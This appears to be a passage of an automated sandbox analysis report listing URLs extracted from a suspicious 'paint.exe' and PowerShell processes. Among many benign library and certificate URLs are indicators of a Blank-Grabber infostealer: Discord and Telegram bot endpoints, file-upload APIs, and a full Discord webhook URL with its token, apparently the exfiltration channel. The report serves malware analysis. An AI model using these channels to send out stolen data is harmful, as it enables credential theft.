00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38ABB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: paint.exe, 00000001.00000002.2010663767.000002077207E000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C84000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004077065.0000020772076000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: paint.exe, 00000001.00000002.2012300197.0000020772CE0000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1753295021.0000020771B25000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38ABB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: paint.exe, 00000001.00000003.1914410375.0000020771D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C68000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0
              Source: paint.exe, 00000001.00000003.1914410375.0000020771D4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: paint.exe, 00000001.00000003.1679446910.0000020771075000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
              Source: paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: paint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: paint.exe, 00000001.00000002.2008331491.0000020771290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: paint.exe, 00000001.00000003.1678970007.000002077107D000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2007861507.0000020770F6C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: paint.exe, 00000001.00000003.1916705724.0000020771B88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: paint.exe, 00000001.00000003.1782235643.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g..b.com/h
              Source: paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://g..b.com/x
              Source: paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: paint.exe, 00000001.00000003.1690340037.00000207714A0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690028343.0000020772398000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690255723.0000020771843000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1690672181.00000207714A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: paint.exe, 00000001.00000002.2007861507.0000020770EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
              Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: paint.exe, 00000001.00000003.1692710715.0000020771486000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1692909387.00000207714C3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: paint.exe, 00000001.00000003.1711530938.0000020771B91000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BA0000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
              Source: paint.exe, 00000001.00000002.2007443684.000002076F58A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38BA88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: paint.exe, 00000001.00000003.1734071594.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920015922.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771C47000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: paint.exe, 00000001.00000002.2008200069.0000020771050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2006772338.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696498061.0000020771927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: paint.exe, 00000001.00000002.2010232784.0000020771C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: paint.exe, 00000001.00000002.2012011288.0000020772710000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008610347.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1771294068.00000207714FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: paint.exe, 00000001.00000002.2012300197.0000020772CC8000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: paint.exe, 00000001.00000002.2012300197.0000020772CD4000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1914665932.0000020772072000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2012300197.0000020772C50000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1913464160.0000020771AD2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781575579.0000020771AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 0000002F.00000002.1831220495.000001B38C1B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2011696050.00000207724C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: paint.exe, 00000001.00000002.2008689837.0000020771590000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
              Source: paint.exe, 00000001.00000002.2015768208.00007FFDFB5D0000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: paint.exe, 00000001.00000003.1782149360.0000020771A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.microsoft.c
              Source: paint.exe, 00000001.00000003.1735925915.0000020771AD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1789072915.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A2A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1726814607.0000020771A14000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712589930.0000020771A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: paint.exe, 00000001.00000003.1719996655.0000020771A4C000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1735925915.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008200069.0000020771094000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1724786299.0000020771AC1000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: paint.exe, 00000001.00000003.1913464160.0000020771AE5000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1729735944.0000020771AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.tro
              Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: paint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: paint.exe, 00000001.00000003.1915866896.0000020771B2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: paint.exe, 00000001.00000003.1915866896.0000020771B0A000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1917249999.0000020771D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.00000207718C2000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
